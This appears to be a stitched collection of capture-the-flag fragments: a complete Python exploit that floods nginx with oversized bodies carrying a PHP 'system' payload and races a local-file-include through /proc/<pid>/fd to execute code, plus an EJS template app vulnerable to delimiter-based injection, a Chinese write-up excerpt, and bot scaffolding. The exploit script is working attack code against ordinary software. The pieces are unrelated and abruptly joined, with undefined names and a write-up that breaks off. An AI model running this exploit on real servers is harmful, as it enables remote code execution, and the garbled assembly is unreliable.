If a file was deleted while a process still holds an open file descriptor to it: realpath() will return the file's former path with " (deleted)" appended to it, while open() on the /proc/<pid>/fd/<fd> link will return an fd that can still be used to read the original file content.
import requests
import threading
import multiprocessing
import random

SERVER = "http://192.168.43.103:49153"
NGINX_PIDS_CACHE = set([34, 35, 36, 37, 38, 39, 40, 41])
# Set the following to True to use the above set of PIDs instead of scanning:
USE_NGINX_PIDS_CACHE = False


def create_requests_session():
    """Build a requests session backed by a large HTTP connection pool.

    Reusing pooled connections avoids per-request TCP handshake latency,
    which matters because the exploit hammers the server in tight loops.
    """
    session = requests.Session()
    adapter = requests.adapters.HTTPAdapter(pool_connections=1000, pool_maxsize=10000)
    session.mount('http://', adapter)
    return session


def get_nginx_pids(requests_session):
    """Return the set of nginx worker PIDs via the file-read primitive.

    Reads /proc/<pid>/cmdline through the vulnerable endpoint for PIDs
    1..199 and keeps those that identify as nginx worker processes.
    """
    if USE_NGINX_PIDS_CACHE:
        return NGINX_PIDS_CACHE
    nginx_pids = set()
    # Scan up to PID 200
    for i in range(1, 200):
        cmdline = requests_session.get(SERVER + f"/?action=read&file=/proc/{i}/cmdline").text
        if cmdline.startswith("nginx: worker process"):
            nginx_pids.add(i)
    return nginx_pids


def send_payload(requests_session, body_size=1024000):
    """POST an oversized body so nginx buffers it into a client-body temp file.

    The PHP payload sits at the start of the body; the rest is padding to
    push the body over nginx's in-memory buffering threshold.
    """
    try:
        # The target path (/bla) doesn't need to exist - we simply need to
        # upload a large body to nginx and fail fast.
        payload = '<?php system("/readflag");__halt_compiler(); ?>'
        requests_session.post(SERVER + "/?action=read&file=/bla",
                              data=(payload + ("a" * (body_size - len(payload)))))
    except Exception:
        # Best-effort: any network error just means we retry on the next loop.
        pass


def send_payload_worker(requests_session):
    """Send payloads forever so temp files keep being (re)created."""
    while True:
        send_payload(requests_session)


def send_payload_multiprocess(requests_session):
    """Fan the payload sender out across all CPUs."""
    for _ in range(multiprocessing.cpu_count()):
        p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))
        p.start()


def generate_random_path_prefix(nginx_pids):
    """Build a random chain of /proc/<pid>/cwd and /proc/<pid>/root components.

    A generated path looks like
    /proc/<pid 1>/cwd/proc/<pid 2>/root/proc/<pid 3>/root
    and is prepended to the fd path to vary the string PHP stats,
    defeating its symlink/path caching. May return "" (zero components).
    """
    path = ""
    component_num = random.randint(0, 10)
    for _ in range(component_num):
        pid = random.choice(nginx_pids)
        if random.randint(0, 1) == 0:
            path += f"/proc/{pid}/cwd"
        else:
            path += f"/proc/{pid}/root"
    return path


def read_file(requests_session, nginx_pid, fd, nginx_pids):
    """Race to include the (deleted) temp file behind /proc/<pid>/fd/<fd>."""
    nginx_pid_list = list(nginx_pids)
    while True:
        path = generate_random_path_prefix(nginx_pid_list)
        path += f"/proc/{nginx_pid}/fd/{fd}"
        try:
            d = requests_session.get(SERVER + f"/?action=include&file={path}").text
        except Exception:
            continue
        if "flag" in d:
            print("Found flag! ")
            print(d)
            exit()


def read_file_worker(requests_session, nginx_pid, nginx_pids):
    """Spawn one reader thread per candidate fd of a single nginx worker."""
    # Scan nginx fds 10-45 in a loop. Since files and sockets keep closing,
    # it's very common for the request-body fd to open within this range.
    for fd in range(10, 45):
        thread = threading.Thread(target=read_file, args=(requests_session, nginx_pid, fd, nginx_pids))
        thread.start()


def read_file_multiprocess(requests_session, nginx_pids):
    """Start one reader process per nginx worker PID."""
    for nginx_pid in nginx_pids:
        p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
        p.start()


if __name__ == "__main__":
    print('[DEBUG] Creating requests session')
    requests_session = create_requests_session()
    print('[DEBUG] Getting Nginx pids')
    nginx_pids = get_nginx_pids(requests_session)
    print(f'[DEBUG] Nginx pids: {nginx_pids}')
    print('[DEBUG] Starting payload sending')
    send_payload_multiprocess(requests_session)
    print('[DEBUG] Starting fd readers')
    read_file_multiprocess(requests_session, nginx_pids)
def server():
    """Serve exactly one HTTP request on MY_PORT, then release the socket."""
    print('[+] http server started', file=sys.stderr)
    httpd = ThreadingSimpleServer(('0.0.0.0', MY_PORT), Handler)
    # we only need to handle one response
    httpd.handle_request()
    # server_close() (not shutdown()) is correct here: shutdown() waits for a
    # serve_forever() loop to acknowledge, and no such loop is running, so it
    # would block forever. server_close() just closes the listening socket.
    httpd.server_close()
// POST /template — store a user-supplied EJS template under a fresh UUID
// and redirect to the rendering route.
app.post('/template', function(req, res) {
    let tmpl = req.body.tmpl;
    let i = -1;
    // Scan every occurrence of "<%"; the 11 characters starting there must be
    // exactly "<%= name %>", otherwise the template is rejected.
    // NOTE(review): this only filters tags that *start* with "<%" — verify no
    // other EJS delimiters/options can smuggle code past this check.
    while((i = tmpl.indexOf("<%", i+1)) >= 0) {
        if (tmpl.substring(i, i+11) !== "<%= name %>") {
            res.status(400).send({message:"Only '<%= name %>' is allowed."});
            return;
        }
    }
    // Draw UUIDs until one doesn't collide with an existing card file.
    let uuid;
    do {
        uuid = crypto.randomUUID();
    } while (fs.existsSync(`views/${uuid}.ejs`))
    try {
        fs.writeFileSync(`views/${uuid}.ejs`, tmpl);
    } catch(err) {
        res.status(500).send("Failed to write Valentine's card");
        return;
    }
    let name = req.body.name ?? '';
    // NOTE(review): `name` is interpolated into the redirect URL unencoded —
    // confirm whether that is intended.
    return res.redirect(`/${uuid}?name=${name}`);
});
// GET /:template — render a previously stored card, passing the query
// string straight through as the EJS render context.
app.get('/:template', function(req, res) {
    const cardId = req.params.template;
    const renderCtx = req.query;
    // Only v4-UUID-shaped names are accepted, so the file lookup below can
    // never escape the views/ directory.
    const uuidV4 = /^[0-9A-F]{8}-[0-9A-F]{4}-[4][0-9A-F]{3}-[89AB][0-9A-F]{3}-[0-9A-F]{12}$/i;
    if (!uuidV4.test(cardId)) {
        res.status(400).send("Not a valid card id");
        return;
    }
    if (!fs.existsSync(`views/${cardId}.ejs`)) {
        res.status(400).send('Valentine\'s card does not exist');
        return;
    }
    if (!renderCtx['name']) {
        renderCtx['name'] = '';
    }
    return res.render(cardId, renderCtx);
});
审计一下代码可以发现,这就是一个模板内容可控的app:我们可以创建自定义内容的ejs模板文件,然后在另一个路由对其进行渲染。题目中有一个误导:<%= name %>,这段提示很容易让人想歪,误以为模板内容只能是这一段,实际上并非如此。我们都知道SSTI就是因为模板符号滥用导致的,这就涉及模板分隔符的概念了。在之前的文章里我们讲到了python原型链污染,当时是通过污染flask的模板分隔符从而达成rce的;这里我们可以查阅一下ejs的官方文档:
# Standard library
import os
import re
import sys
import time
from urllib.parse import quote

# Third-party: browser automation
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.chrome.service import Service
from webdriver_manager.chrome import ChromeDriverManager
from webdriver_manager.core.utils import ChromeType
def get(prompt, regex):
    """Prompt the user for a line of input and validate it against *regex*.

    Returns the raw input on a match; terminates the process with exit
    status 1 (after printing a diagnostic) when it does not match.
    """
    inp = input(prompt)
    if not re.match(regex, inp):
        print(f"Input {inp} does not match regex {regex}", flush=True)
        exit(1)
    return inp
# log in: embed the (URL-quoted) proxy credentials in the URL itself so the
# browser authenticates without an interactive prompt
base_url = f"http://{quote(PROXY_USERNAME)}:{quote(PROXY_PASSWORD)}@{CHALLENGE_IP}:{PORT}"
print(f"Logging in to {base_url}", flush=True)
driver.get(base_url)